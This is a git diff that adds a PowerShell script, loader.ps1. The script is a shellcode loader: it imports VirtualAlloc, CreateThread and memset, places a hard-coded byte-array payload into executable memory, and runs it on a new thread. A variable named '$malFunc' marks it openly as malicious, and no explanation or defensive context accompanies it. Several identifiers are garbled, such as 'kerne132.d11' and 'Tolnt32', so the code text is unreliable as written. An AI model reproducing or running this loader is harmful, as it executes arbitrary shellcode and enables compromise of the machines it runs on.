diff --git a/loader.ps1 b/loader.ps1 new file mode 100644 index 0000000..4bab2ab --- /dev/null +++ b/loader.ps1 @@ -0,0 +1,15 @@ +$pos= '[DllImport("kernel32.d11")] +public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwpysize, uint flAllocationType, uint flProtect);[DllImport("kerne132.d11")] +public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackpysize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); +[DllImport("msvcrt.dll")] +public static extern IntPtr memset(IntPtr dest, uint src, uint count);'; + +$malFunc = Add-Type -memberDefinition $pos -Name 11Win32" -namespace Win32Functions -p assthru; +[Byte []]; +[Byte[]] $pyld = 0xda,0xd6,0xba,0x41,0xd8,0xb7,0x3e,0xd9,0x74,0x24,0xf4,0x5e,0x29,0xc9,0xb1,0x59,0x31,0x56,0x19,0x83,0xee,0xfc,0x3,0x56,0x15,0xa3,0x2d,0x4b,0xd6,0xac,0xce,0xb4,0x27,0xd2,0x47,0x51,0x16,0xc0,0x3c,0x11,0xb,0xd4,0x37,0x77,0xa0,0x9f,0x1a,0x6c,0xb7,0x28,0xd0,0xaa,0x4c,0x24,0xcd,0x83,0xad,0xf9,0xcd,0x48,0x6d,0x98,0xb1,0x92,0xa2,0x7a,0x8b,0x5c,0xb7,0x7b,0xcc,0x2a,0xbd,0x94,0x80,0xfb,0xb6,0x38,0x35,0x8f,0x8b,0x80,0x34,0x5f,0x80,0xb8,0x4e,0xda,0x57,0x4c,0xe3,0xe5,0x87,0x27,0xa3,0xc5,0x77,0xbc,0x1c,0x1e,0x79,0x11,0x19,0xd7,0xd,0xa9,0x6b,0xd9,0x12,0x5a,0x5f,0x92,0xec,0x8a,0x91,0x64,0x42,0xf3,0x1d,0x69,0x9a,0x34,0x99,0x92,0xe9,0x4e,0xd9,0x2f,0xea,0x95,0xa3,0xeb,0x7f,0x9,0x3,0x7f,0x27,0xed,0xb5,0xac,0xbe,0x66,0xb9,0x19,0xb4,0x20,0xde,0x9c,0x19,0x5b,0xda,0x15,0x9c,0x8b,0x6a,0x6d,0xbb,0xf,0x36,0x35,0xa2,0x16,0x92,0x98,0xdb,0x48,0x7a,0x44,0x7e,0x3,0x69,0x93,0xfe,0xec,0x71,0x9c,0xa2,0x7a,0xbd,0x51,0x5d,0x7a,0xa9,0xe2,0x2e,0x48,0x76,0x59,0xb9,0xe0,0xff,0x47,0x3e,0x71,0x17,0x78,0x90,0x39,0x78,0x86,0x11,0x39,0x50,0x4d,0x45,0x69,0xca,0x64,0xe6,0xe2,0xa,0x88,0x33,0x9e,0x0,0x1e,0x7c,0xf6,0x14,0xc7,0x14,0x4,0x17,0xf6,0x5f,0x81,0xf1,0xa8,0xcf,0xc1,0xad,0x8,0xa0,0xa1,0x1d,0xe1,0xaa,0x2e,0x41,0x11,0xd5,0xe5,0xea,0xb8,0x3a,0x53,0x42,0x55,0xa2,0xfe,0x18,0xc4,0x2b,0xd5,0x64,0xc6,0xa0,0xdf,0x99,0x89,0x40,0xaa,0x89,0xfe,0x36,0x54,0x52,0xff,0xd2,0x54,0x38,0xfb,0x74,0x3,0xd4,0x1,0xa0,0x63,0x7b,0xf9,0x87,0xf0,0x7c,0x5,0x56,0xc0,0xf7,0x30,0xcc,0x6c,0x60,0x3d,0x0,0x6c,0x70,0x6b,0x4a,0x6c,0x18,0xcb,0x2e,0x3f,0x3d,0x14,0xfb,0x2c,0xee,0x81,0x4,0x4,0x42,0x1,0x6d,0xaa,0xbd,0x65,0x32,0x55,0xe8,0xf5,0x35,0xa9,0x6e,0xd2,0x9d,0xc1,0x90,0x62,0x1e,0x11,0xfb,0x62,0x4e,0x79,0xf0,0x4d,0x61,0x49,0xf9,0x47,0x2a,0xc1,0x70,0x6,0x98,0x70,0x84,0x3,0x7c,0x2c,0x85,0xa0,0xa5,0xdf,0xfc,0xc9,0x5a,0x20,0x1,0xc0,0x3e,0x21,0x1,0xec,0x40,0x1e,0xd7,0xd5,0x36,0x61,0xeb,0x61,0x48,0xd4,0x4e,0xc3,0xc3,0x16,0xdc,0x13,0xc6 +$pysize= 0x1000; +if ($pyld.Length -gt 0x1000) {$pysize = $pyld.Length}; +$z = $malFunc::VirtualAlloc(0,$pysize,0x3000,0x40); +for ($i=0;$i -le ($pyld.Length-1);$i++) {$malFunc::memset([IntPtr]($z.Tolnt32()+$i), $pyld +[$i], 1)} ; +$malFunc::CreateThread(0,0,$z,0,0,0);for (;;) { Start-sleep 60 };